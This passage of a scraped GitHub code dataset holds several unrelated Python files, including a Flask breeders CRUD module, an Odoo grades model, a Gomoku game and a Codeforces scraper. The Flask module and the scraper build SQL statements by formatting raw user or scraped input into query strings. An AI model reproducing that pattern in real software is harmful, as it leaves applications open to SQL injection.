self.n_actions)\n )\n\n def choose_best_action(self, state):\n return np.argmax(self.old_values[state])\n\n def calculate_diff(self):\n return self.env.get_result(self.q, self.discount)\n\n def update(self, state, action, r, ns):\n q_estimate = np.max(self.old_values[ns])\n td_target = r + self.discount * q_estimate\n td_delta = td_target - self.q[state, action]\n self.q[state, action] += self.lr * td_delta\n if self.q[state, action] <= self.old_values[state, action]:\n self.old_values[state, action] = self.q[state, action]\n else:\n self.old_values[state, action] *= 1 - self.beta\n self.old_values[state, action] += self.beta * self.q[state, action]\n","repo_name":"yooyoo9/randmin","sub_path":"tabular/agents/avgmin.py","file_name":"avgmin.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8981884075","text":"from flask import render_template, redirect, url_for, flash\nfrom .sql import *\nfrom ..utils import extract_if_any, handle_postgres_error\nimport sys\n\n\ndef handle_add(request, cursor, conn):\n if request.method == 'POST':\n try:\n cursor.execute(GET_LATEST_ID)\n new_id = cursor.fetchall()[0][0] + 1\n breeder_name_to_add = request.form.get('breeder_name_to_add')\n breeder_surname_to_add = request.form.get('breeder_surname_to_add')\n breeder_email_to_add = request.form.get('breeder_email_to_add')\n breeder_phone_number_to_add = request.form.get('breeder_phone_number_to_add')\n cursor.execute(ADD_BREEDER.format(new_id, breeder_name_to_add, breeder_surname_to_add, breeder_email_to_add,\n breeder_phone_number_to_add))\n conn.commit()\n return redirect(url_for('browser.breeders'))\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'editor.breeders')\n\ndef handle_delete(request, cursor, conn):\n if request.method == 'POST':\n try:\n breeder_id_to_delete = request.form['breeder_id_to_delete']\n cursor.execute(POSSIBLE_TO_DELETE_BREEDER.format(breeder_id_to_delete))\n possible_to_delete_breeder = cursor.fetchall()\n if possible_to_delete_breeder[0][0]:\n cursor.execute(DELETE_BREEDER.format(breeder_id_to_delete))\n conn.commit()\n return redirect(url_for('browser.breeders'))\n\n flash(\"Nie można usunąć hodowcy o id = {}, ponieważ referencję\"\n \" do tego klucza znaleziono w innych tabelach\".format(breeder_id_to_delete))\n return redirect(url_for('editor.breeders'))\n\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'editor.breeders')\n\n\ndef handle_edit(request, cursor, conn):\n try:\n if request.method == 'POST':\n breeder_id_to_edit = request.form.get('breeder_id_to_edit')\n breeder_name_to_edit = request.form.get('breeder_name_to_edit')\n breeder_surname_to_edit = request.form.get('breeder_surname_to_edit')\n breeder_email_to_edit = request.form.get('breeder_email_to_edit')\n breeder_phone_number_to_edit = request.form.get('breeder_phone_number_to_edit')\n cursor.execute(UPDATE_BREEDER.format(breeder_id_to_edit, breeder_name_to_edit, breeder_surname_to_edit,\n breeder_email_to_edit, breeder_phone_number_to_edit))\n conn.commit()\n return redirect(url_for('browser.breeders'))\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'editor.breeders')\n\n\ndef handle_search(request, cursor, conn):\n if request.method == 'GET':\n try:\n breeder_id = request.args.get('breeder_id')\n breeder_name = request.args.get('breeder_name')\n breeder_surname = request.args.get('breeder_surname')\n query = SEARCH_BREEDER\n any_condition_present = False\n built_query = \"\"\n if breeder_id:\n built_query += \" id = \" + breeder_id\n any_condition_present = True\n if breeder_name:\n if any_condition_present:\n built_query += \" AND \"\n built_query += \" imie = '{}' \".format(breeder_name)\n any_condition_present = True\n if breeder_surname:\n if any_condition_present:\n built_query += \" AND \"\n built_query += \" nazwisko = '{}' \".format(breeder_surname)\n\n if built_query == \"\":\n cursor.execute(ALL_BREEDERS)\n else:\n cursor.execute(query + built_query)\n\n results = cursor.fetchall()\n return render_template('browser/breeders.html', breeders=results)\n\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'browser.breeders')\n\n\ndef details(cursor, id, conn):\n try:\n stats = []\n cursor.execute(SEARCH_BREEDER + ' id = ' + str(id))\n personal_data = cursor.fetchall()[0]\n\n cursor.execute(BREEDER_KENNELS_COUNT.format(id))\n stats.append(extract_if_any(cursor, True))\n\n cursor.execute(BREEDER_DOGS_COUNT.format(id))\n stats.append(extract_if_any(cursor, True))\n\n cursor.execute(BREEDER_BREEDS_COUNT.format(id))\n stats.append(extract_if_any(cursor, True))\n\n cursor.execute(BREEDER_REGIONS_COUNT.format(id))\n stats.append(extract_if_any(cursor, True))\n return render_template('browser/breeder_details.html', personal_data=personal_data, stats=stats)\n\n except Exception as err:\n return handle_postgres_error(err, cursor, conn, 'browser.breeders')\n\n\n","repo_name":"dannyxn/Dog-Breeders-Association","sub_path":"main/breeders/breeders_actions.py","file_name":"breeders_actions.py","file_ext":"py","file_size_in_byte":4923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12981472829","text":"def main():\n \n with open('dataset_2_6.txt', 'r') as infile:\n \n for i,j in enumerate(infile):\n if i == 0:\n mytext = str(j.strip()) \n \n else:\n mypat = str(j.strip())\n \n mypatcoyunt = PatternCount(mytext, mypat)\n print(mypatcoyunt)\n \ndef PatternCount(atext, apattern):\n \n mycounter = 0\n \n lentext = len(atext)\n lenpatt = len(apattern)\n \n for i in range(0, lentext-lenpatt+1, 1):\n if str(atext[i:lenpatt+i]) == apattern:\n mycounter += 1\n \n return mycounter\n \n \n\nif __name__ == \"__main__\": main()\n","repo_name":"jcobena/Bioinformatics","sub_path":"0_PatternCount/PatternCount.py","file_name":"PatternCount.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9377626025","text":"from odoo import models, fields, api, _\n\n\n# _ untuk translate\n\nclass khs(models.Model): # inherit dari Model\n _name = 'nilai.khs' # attribut dari class Model (lihat dokumen odoo)\n _description = 'class untuk menyimpan data KHS'\n _rec_name = 'name'\n\n name = fields.Char(compute=\"_compute_name\", store=True, recursive=True)\n semester = fields.Selection([('Genap', 'Genap'),\n ('Gasal', 'Gasal')], 'Semester', required=True, readonly=True,\n default='Genap', states={'draft': [('readonly', False)]}, )\n state = fields.Selection([('draft', 'Draft'),\n ('done', 'Approved'),\n ('canceled', 'Canceled')], 'State', required=True, readonly=True,\n default='draft')\n ips = fields.Float(\"IPS\", compute=\"_compute_ips\", store=True, default=0)\n tahun = fields.Char(\"Tahun\", size=15, default=\"2021/2022\", required=True, readonly=True,\n states={'draft': [('readonly', False)]})\n\n mhs_id = fields.Many2one('nilai.mahasiswa', string='Mahasiswa', readonly=True, ondelete=\"cascade\",\n states={'draft': [('readonly', False)]},\n domain=\"[('state', '=', 'done')]\")\n nilai_mhs_ids = fields.One2many('nilai.nilai_mhs', 'khs_id', string='Nilai mhs', readonly=True,\n states={'draft': [('readonly', False)]})\n _sql_constraints = [('name_unik', 'unique(mhs_id, semester, tahun)', _('The KHS already exist!'))]\n\n @api.depends( \"nilai_mhs_ids\", \"nilai_mhs_ids.mk_id\", \"nilai_mhs_ids.grade\", \"state\")\n def _compute_ips(self):\n self.ips=0\n total_sks=0\n for nilai_mhs1 in self.nilai_mhs_ids:\n self.ips+=nilai_mhs1.subtotal\n total_sks+=nilai_mhs1.mk_sks\n if(total_sks==0):\n self.ips=0\n else:\n self.ips=self.ips/total_sks\n\n def action_done(self):\n self.state = 'done'\n\n\n def action_canceled(self):\n self.state = 'canceled'\n\n\n def action_settodraft(self):\n self.state = 'draft'\n\n @api.depends('mhs_id.name', 'semester', 'tahun')\n def _compute_name(self):\n for s in self:\n s.name = \"%s - %s - %s\" % (s.mhs_id.name, s.semester, s.tahun)\n\n @api.model\n def _name_search(self, name='', args=None, operator='ilike', limit=100, name_get_uid=None):\n args = list(args or [])\n # optimize out the default criterion of ``ilike ''`` that matches everything\n if not (name == '' and operator == 'ilike'):\n args += [(self._rec_name, operator, name)]\n return self._search(args, limit=limit, access_rights_uid=name_get_uid)\n","repo_name":"yulia7607/custom","sub_path":"nilai/models/khs.py","file_name":"khs.py","file_ext":"py","file_size_in_byte":2741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"355850320","text":"import pygame, render, gomoku, minimax, ai\nfrom gomoku import *\nfrom render import *\nfrom minimax import *\nfrom ai import *\n\n\nclass Game(object):\n def __init__(self, gomoku):\n self.minimax = Minimax(gomoku, 2, 2)\n self.ai = Ai(gomoku)\n self.render = Render(gomoku)\n\n def on_event(self, event):\n if event.type == pygame.QUIT:\n gomoku.running = False\n\n if gomoku.player:\n if event.type == pygame.MOUSEBUTTONUP:\n if gomoku.mouse_in_botton():\n if not gomoku.playing:\n gomoku.start()\n gomoku.first_step()\n else:\n gomoku.surrender()\n\n elif gomoku.playing:\n pos = pygame.mouse.get_pos()\n r = (pos[0] - PADDING + WIDTH // 2) // (WIDTH + MARGIN)\n c = (pos[1] - PADDING + WIDTH // 2) // (WIDTH + MARGIN)\n\n if 0 <= r < NUMBER_OF_INTERSECTION and 0 <= c < NUMBER_OF_INTERSECTION:\n if gomoku.get_grid_state(r, c) == 0:\n gomoku.lastPosition = [r, c]\n gomoku.set_grid_state(r, c, 1)\n gomoku.numberOfPiece += 1\n\n # check win\n gomoku.win = self.check_win([r, c], gomoku.player)\n if gomoku.win > 0:\n gomoku.playing = False\n gomoku.player = False\n gomoku.com = True\n else:\n gomoku.player = False\n else:\n if gomoku.playing:\n #gomoku.lastPosition = self.minimax.find_way()\n self.minimax.find_way()\n r = gomoku.lastPosition[0]\n c = gomoku.lastPosition[1]\n gomoku.set_grid_state(r, c, 2)\n gomoku.numberOfPiece += 1\n gomoku.win = self.check_win([r, c], gomoku.player)\n if gomoku.win > 0:\n gomoku.playing = False\n gomoku.player = True\n gomoku.com = False\n else:\n gomoku.player = True\n\n if not gomoku.playing:\n gomoku.player = True\n\n def check_win(self, position, player):\n # Check hoà (full bàn cờ)\n if (gomoku.numberOfPiece == NUMBER_OF_INTERSECTION * NUMBER_OF_INTERSECTION):\n return STATUS[1]\n\n # Check thắng thua\n target = 1 if player else 2\n if gomoku.get_grid_state(position[0], position[1]) != target:\n return STATUS[0]\n directions = [([0, 1], [0, -1]), ([1, 0], [-1, 0]), ([-1, 1], [1, -1]), ([1, 1], [-1, -1])]\n for direction in directions:\n mark = 0\n for i in range(2):\n p = position[:]\n while 0 <= p[0] < NUMBER_OF_INTERSECTION and 0 <= p[1] < NUMBER_OF_INTERSECTION:\n if gomoku.get_grid_state(p[0], p[1]) == target:\n mark += 1\n else:\n break\n p[0] += direction[i][0]\n p[1] += direction[i][1]\n if mark >= 6:\n return STATUS[2]\n return STATUS[0]\n \n def player_vs_com(self):\n while gomoku.running: # Game loop\n self.render.gomoku_board_init()\n for event in pygame.event.get():\n self.on_event(event)\n self.render.on_render()\n gomoku.on_cleanup()\n\n def __call__(self):\n self.player_vs_com()\n\nif __name__ == \"__main__\":\n gomoku = Gomoku()\n game = Game(gomoku)\n game()","repo_name":"phucvh255/gomoku","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12309957366","text":"\"\"\"\nPolymorphismApp.py\nBilly Cussen\n12/10/2020\n\"\"\"\n\n#Objects\nimport gc\nimport Language\nfrom Language import myLanguage\nimport English\nfrom English import myEnglish\nimport French\nfrom French import myFrench\nimport German\nfrom German import myGerman\n \n#Variables\nrepeat = \"y\"\ninputCheck = True\n\nwhile repeat == \"y\":\n\n myLanguageApp = myLanguage\n print(myLanguageApp.speak())\n inputCheck = True\n #Input - Get Language\n while inputCheck:\n try:\n language = str(input(\"Please enter a Language, \\\"English\\\", \\\"French\\\" or \\\"German\\\": \"))\n language = language.lower()\n except:\n print(\"You need to enter one of the languages specified\")\n finally:\n if language != \"english\" and language != \"french\" and language != \"german\":\n print(\"You need to enter \\\"English\\\", \\\"French\\\" or \\\"German\\\"\")\n else: \n inputCheck = False\n myLanguageApp = None\n\n try:\n if language == \"english\":\n myLanguageApp = myEnglish\n elif language == \"french\":\n myLanguageApp = myFrench\n elif language == \"german\":\n myLanguageApp = myGerman \n else:\n raise Exception(\"Something went Wrong here, invalid language Input!\")\n \n print(myLanguageApp.speak())\n except Exception as e:\n print(e)\n finally:\n myLanguageApp = None\n gc.collect()\n\n repeat = \"\"\n while repeat != \"y\" and repeat != \"n\":\n repeat = str(input(\"Please enter \\\"Y\\\" to Retry, \\\"N\\\" to Exit: \"))\n repeat = repeat.lower()\n if repeat !=\"y\" and repeat != \"n\":\n print(\"You need to enter \\\"Y\\\" or \\\"N\\\"\")\n\nprint(\"Thanks for using my App!\")","repo_name":"BillyCussen/CodingPractice","sub_path":"Python/Software Development Module - Python/Week12/PolymorphismApp.py","file_name":"PolymorphismApp.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71137770026","text":"# Zachary Robin\n# CSCI 169: Programminig HW 2\n# Dr. Linnell \n# 04/24/19\n\n# Part 1:\n# Q: Explain in words the output of the given program.\n# A: Running the program yields the following output \n# After local assignment: test spam\n# After nonlocal assignment: nonlocal spam\n# After global assignment: nonlocal spam\n# In global scope: global spam\n# The local assignment makes sense since it is the first \n# assignment and the first function to be called. \n# Next the nonlocal function is called and declared \n# so it makes sense that it works. However, the next \n# portion, the global function is called and executed \n# but the \"nonlocal spam\" is returned instead. This \n# is due to the LEGB scoping rules for python in which \n# the priority is given first to local, then enclosed, \n# global, and finally built in. Since enclosed and \n# local take priority over global, it makes sense that\n# the \"spam\" variable does not change because the \n# scope is the same thus the priority does not change.\n# But when the scope_test is run, the global then \n# takes priority, and is thus used in the final return. \n\n\n# ******************************************************\n# Part 2:\n# 8-Queens problem\n\n# Fill the board\ndef fill():\n row = [0,0,0,0,0,0,0,0]\n column = [\n [1,0,0,0,5,0,0,0]\n ,[0,2,0,0,6,0,0,0]\n ,[0,0,3,0,0,7,0,0]\n ,[0,0,0,4,0,0,8,0]\n ,[1,0,0,0,5,0,0,9]\n ,[0,2,0,0,0,6,0,0]\n ,[0,0,3,0,0,0,7,0]\n ,[0,0,0,4,0,0,0,8]]\n # for i in range(0,8):\n # column.append(row)\n return column\n\n# Prints out the board in a 8x8 matrix. Input needs to be a list of lists, that is columns of rows.\ndef fprint(board):\n for i in range(0,8):\n print(board[i])\n\n# Takes in a board, returns 1 if two or more queens can attack eachother. Else 0.\ndef collisionCheck(board):\n # This function is used in the horrizontal and diagonal detection to check if a list has two queens present. \n # Returns 1 if two or more, else 0 \n def listCheck(l):\n flag = 0\n for i in range(0,8):\n if(i == 1):\n flag = flag + 1\n if(flag >=2):\n return 1\n return 0\n\n # Check horizontal collision \n for i in range(0,8):\n flag = 0\n for j in range (0,8):\n if(board[i][j]==1):\n flag = flag + 1\n if(flag >= 2):\n return \"horizontal Nah\"\n # Check vertical collision \n for i in range(0,8):\n flag = 0\n for j in range (0,8):\n if(board[j][i]==1):\n flag = flag + 1\n if(flag >= 2):\n return \"vertical Nah\"\n # Check diagonal left collision (down and right)\n col = 7\n row = 0 \n \n\n\n\n # Check diagonal right collision (up and right)\n\n \n\n\n\n return \"Gucci\" \nz = fill()\n\nfor i in range(1,6):\n print(i)\n# print(collisionCheck(z))\n\n\n\n\n# Places the queens and calls collisionCheck to see if you can place a certain queen there.\n\n\n","repo_name":"zacharyrobin/csci169","sub_path":"hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44815142574","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom collections import defaultdict\nfrom threading import Thread,RLock\nimport sqlite3 as sq3\nimport time\nfrom datetime import datetime, timedelta\n\n\n# AW = Accepted Wrong\ndef q_generator( handle,aw,rating,point,query_list,question,date_time ):\n\tq = \"insert into aw(name,aw,rating,point,question_txt,question_link,date_time) values('{}',{},{},{},'{}','{}','{}');\".format(handle,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\taw,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\trating,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tpoint,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tquestion.text.strip().strip(\"\\n\").replace(\"'\",\"\"),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tquestion['href'].strip(),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tdate_time )\n\t\n\tquery_list.append( q )\n\n\ndef func_points(handle,rating,data,AW,query_list,question,date_time):\n\n\tif AW:\n\t\taw=1\n\telse:\n\t\taw=0\n\n\tif data[handle][\"star\"] == 4:\n\t\tif rating < 1100:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\t\n\t\t\t\tq_generator( handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 1400:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-1100)/100)*10+50\n\t\t\t\tq_generator( handle,aw,rating, ((rating-1100)/100)*10+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-1100)/100)*10+50)//5\n\t\t\t\tq_generator( handle,aw,rating, -(((rating-1100)/100)*10+50)//5,query_list,question,date_time )\n\n\n\tif data[handle][\"star\"] == 3:\n\t\tif rating < 1000:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\n\t\t\t\tq_generator( handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 1200:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-1000)/100)*25+50\n\t\t\t\tq_generator( handle,aw,rating,((rating-1000)/100)*25+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-1000)/100)*25+50)//5\n\t\t\t\tq_generator( handle,aw,rating,-(((rating-1000)/100)*25+50)//5,query_list,question,date_time )\n\n\n\tif data[handle][\"star\"] == 2:\n\t\tif rating < 900:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\n\t\t\t\tq_generator( handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 1100:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-900)/100)*25+50\n\t\t\t\tq_generator( handle,aw,rating,((rating-900)/100)*25+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-900)/100)*25+50)//5\n\t\t\t\tq_generator( handle,aw,rating,-(((rating-900)/100)*25+50)//5,query_list,question,date_time )\n\n\n\tif data[handle][\"star\"] == 1:\n\t\tif rating < 700:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 30\n\t\t\t\tq_generator( handle,aw,rating,30,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 6\n\t\t\t\tq_generator( handle,aw,rating,-6,query_list,question,date_time )\n\n\t\telif rating > 900:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += 100\n\t\t\t\tq_generator( handle,aw,rating,100,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= 20\n\t\t\t\tq_generator( handle,aw,rating,-20,query_list,question,date_time )\n\n\t\telse:\n\t\t\tif AW==True:\n\t\t\t\tdata[handle][\"points\"] += ((rating-700)/100)*25+50\n\t\t\t\tq_generator( handle,aw,rating,((rating-700)/100)*25+50,query_list,question,date_time )\n\n\t\t\telse:\n\t\t\t\tdata[handle][\"points\"] -= (((rating-700)/100)*25+50)//5\n\t\t\t\tq_generator( handle,aw,rating,-(((rating-700)/100)*25+50)//5,query_list,question,date_time )\n\n\n\treturn data[handle][\"points\"]\t\n\n\ndef fetch_rating(link):\n\n\tr = requests.get(link)\n\tsoup = BeautifulSoup(r.text,\"html.parser\")\n\ttry:\n\t\trating = int(soup.find(\"span\",{\"class\":\"tag-box\",\"title\":\"Difficulty\"}).text.strip().strip(\"*\"))\n\texcept:\n\t\trating = -1\n\treturn rating\n\ndef get_questions( handle, page,data,pointer_initiated ):\n\tlink = \"https://codeforces.com/submissions/{}/page/{}\".format(handle,page)\n\tr = requests.get(link)\n\tsoup = BeautifulSoup(r.text,\"html.parser\")\n\ttable = soup.find_all(\"table\",{\"class\":[\"status-frame-datatable\"]})[0]\n\ttrs = table.find_all(\"tr\")[1:]\n\n\tc = 0\n\tw = 0\n\tsubmission = []\n\tbr=0\n\tfor i in trs:\n\t\tpoint = i.find_all(\"td\")[0].text.strip()\n\t\tquestion = i.find_all(\"td\")[3].find(\"a\")\n\t\tdate_time = i.find_all(\"td\")[1].text.strip().strip(\"\\n\")\n\t\tdate_time = (datetime.strptime( date_time,\"%b/%d/%Y %H:%M\" )+timedelta(hours=2,minutes=30)).strftime(\"%b/%d/%Y %H:%M\")\n\n\n\t\tprint( point,date_time, datetime.strptime( date_time, \"%b/%d/%Y %H:%M\" ) > datetime.strptime( \"2020-03-20 00:00\", \"%Y-%m-%d %H:%M\" ) )\n\n\t\tif data[handle]['pointer']==point or datetime.strptime( date_time, \"%b/%d/%Y %H:%M\" ) < datetime.strptime( \"2020-03-16 00:00\", \"%Y-%m-%d %H:%M\" ):\n\t\t\tbr=1\n\t\t\tbreak\n\n\t\t# print( i )\n\t\t# print( i.find_all(\"td\")[5].find_all(\"span\") )\n\t\ttry:\n\t\t\tif datetime.strptime( date_time, \"%b/%d/%Y %H:%M\" ) <= datetime.strptime( \"2020-03-20 00:00\", \"%Y-%m-%d %H:%M\" ): \n\t\t\t\tif i.find_all(\"td\")[5].text.find(\"Running\")==-1 and i.find_all(\"td\")[5].text.find(\"queue\")==-1:\n\n\t\t\t\t\tif not pointer_initiated[0]:\n\t\t\t\t\t\tdata[handle]['pointer']=point\n\t\t\t\t\t\tprint(\"pointer Initiated with value {}\".format(point))\n\t\t\t\t\t\tpointer_initiated[0]=True\n\n\t\t\t\t\tverdict = i.find_all(\"td\")[5].find_all(\"span\")[1].text\n\t\t\t\t\tif verdict == \"Accepted\":\n\t\t\t\t\t\tc = c + 1\n\t\t\t\t\t\tlink = \"https://codeforces.com\"+i.find_all(\"td\")[3].a['href']\n\t\t\t\t\t\trating = fetch_rating(link)\n\t\t\t\t\t\tif rating!=-1:\n\t\t\t\t\t\t\tsubmission.append( (rating,question,True,date_time) )\n\t\t\t\t\telse:\n\t\t\t\t\t\tw = w + 1\n\t\t\t\t\t\tlink = \"https://codeforces.com\"+i.find_all(\"td\")[3].a['href']\n\t\t\t\t\t\trating = fetch_rating(link)\n\t\t\t\t\t\tif rating!=-1:\n\t\t\t\t\t\t\tsubmission.append( (rating,question,False,date_time) )\n\t\t\t\telse:\n\t\t\t\t\tprint(\"This Question is in queue or running\")\n\t\t\telse:\n\t\t\t\tprint(\"Date time exeded for this question\")\n\t\texcept:\n\t\t\tpass\n\t\t\n\treturn [ [c,w,submission], br ]\n\n\n# def start_pointer( handle ):\n# \tlink = \"https://codeforces.com/submissions/{}/page/1\".format(handle)\n# \tr = requests.get(link)\n# \tsoup = BeautifulSoup(r.text,\"html.parser\")\n# \ttable = soup.find_all(\"table\",{\"class\":[\"status-frame-datatable\"]})[0]\n# \ttrs = table.find_all(\"tr\")[1:]\n# \tfp = trs[0].find_all(\"td\")[0].text.strip().strip(\"\\n\")\n# \treturn fp\n\ndef page_traversal(handle,data,query_list):\n\n\tc,w,submission=0,0,[]\n\tpage=1\n\tpointer_initiated = [ False ]\n\n\twhile(1):\n\t\tresult = get_questions( handle,page,data,pointer_initiated )\n\t\tl=result[0]\n\t\tc+=l[0]\n\t\tw+=l[1]\n\t\tsubmission+=l[2]\n\t\t\t\n\t\tif result[1]==1:\n\t\t\tbreak\n\n\t\tpage+=1\n\n\tfor i in submission:\n\t\tfunc_points(handle,i[0],data,i[2],query_list,i[1],i[3])\n\n\tdata[handle]['accepted'] += c\n\tdata[handle]['wrong'] += w\n\n\tprint( \"{} Accepted:{}, Wrong:{}, Points:{}\\n\".format( handle, c,w, data[handle]['points'] ) )\n\ndef update_point( handle,data,query_list,lock ):\n\n\tdata1 = dict(data)\n\tquery_list1 = list( query_list )\n\t\n\tpage_traversal(handle,data1,query_list1)\n\n\tlock.acquire()\n\tprint(\"lock Acquired\")\n\n\tdata = dict (data1)\n\tquery_list += list( query_list1 )\n\tprint( query_list )\n\tlock.release()\n\tprint(\"Lock Released\")\n\n\ndef score_count( handles ):\n\tdb = sq3.connect(\"score.db\")\n\tc = db.cursor()\n\tq=\"select star,name,points,pointer,accepted,wrong from score;\"\n\tc.execute(q)\n\td = c.fetchall()\n\tdata = defaultdict(dict)\n\tdata = { i[1]:{'star':i[0],'points':i[2],'pointer':i[3],'accepted':i[4],'wrong':i[5]} for i in d }\n\tquery_list = []\n\tlock = RLock()\n\n\n\tthreads=[]\n\n\tfor handle in handles:\n\t\t\n\t\ti = Thread( target=update_point,args=(handle,data,query_list,lock) )\n\t\ti.start()\n\t\tthreads.append( i )\n\t\t# update_point(handle,data,query_list,lock)\n\n\tfor i in threads:\n\t\tprint(\"Thread is joining\")\n\t\ti.join()\n\n\tfor i in data:\n\t\tq1=\"update score set points={},pointer='{}',accepted={},wrong={} where name='{}'\".format(data[i]['points'],data[i]['pointer'],data[i]['accepted'],data[i]['wrong'],i)\n\t\tc.execute(q1)\n\n\tfor i in query_list:\n\t\tprint(i)\t\n\t\tc.execute(i)\n\n\tdb.commit()\n\tdb.close()\n\n\n\t\n","repo_name":"chiragsoni81245/scoreboard","sub_path":"app/utility_function.py","file_name":"utility_function.py","file_ext":"py","file_size_in_byte":8716,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1287130914","text":"from plone import api\nfrom plone.dexterity.content import Container\n\nfrom seantis.plonetools import tests\nfrom seantis.plonetools.behaviors.customtitle import on_object_modified\n\n\nclass CustomTitleContainer(Container):\n\n def get_custom_title(self):\n return self.custom_title\n\n\nclass TestBehaviors(tests.IntegrationTestCase):\n\n def test_custom_title_behavior(self):\n\n behavior = 'seantis.plonetools.behaviors.customtitle.ICustomTitle'\n klass = 'seantis.plonetools.tests.test_behaviors.CustomTitleContainer'\n\n portal_type = self.new_temporary_type(\n behaviors=[behavior], klass=klass\n ).id\n\n with self.user('admin'):\n obj = api.content.create(\n id='',\n type=portal_type,\n container=self.new_temporary_folder(),\n custom_title=u'My custom title'\n )\n\n self.assertEqual(obj.id, 'my-custom-title')\n self.assertEqual(obj.title, u'My custom title')\n\n obj.custom_title = u'Another swell title'\n on_object_modified(obj)\n\n # the id does not change after initial creation\n self.assertEqual(obj.id, 'my-custom-title')\n self.assertEqual(obj.title, u'Another swell title')\n","repo_name":"seantis/seantis.plonetools","sub_path":"seantis/plonetools/tests/test_behaviors.py","file_name":"test_behaviors.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27685090770","text":"print(\"Welcome to my country quiz!\")\r\n\r\nplaying = input(\"Do you want to play? \\n\")\r\nif playing.lower() != \"yes\":\r\n quit()\r\n\r\nprint(\"Ok, let's play! \")\r\nscore = 0\r\n\r\nanswer = input(\"What is the smallest country in the world? \\n\")\r\nif answer.lower() == \"vatican city\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Inconrrect!\")\r\n\r\nanswer = input(\"HWhat is the biggest country in the world? \\n\")\r\nif answer.lower() == \"russia\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Inconrrect!\")\r\n\r\nanswer = input(\"How many countries have their capital city in Europe? \\n\")\r\nif answer.lower() == \"44\":\r\n print(\"Correct!\")\r\n score += 1\r\nelse:\r\n print(\"Inconrrect!\")\r\n\r\nanswer = input(\"WWich continent is missing: Africa; North America; South America; Antartica; Europe; Oceania? \\n\")\r\nif answer.lower() == 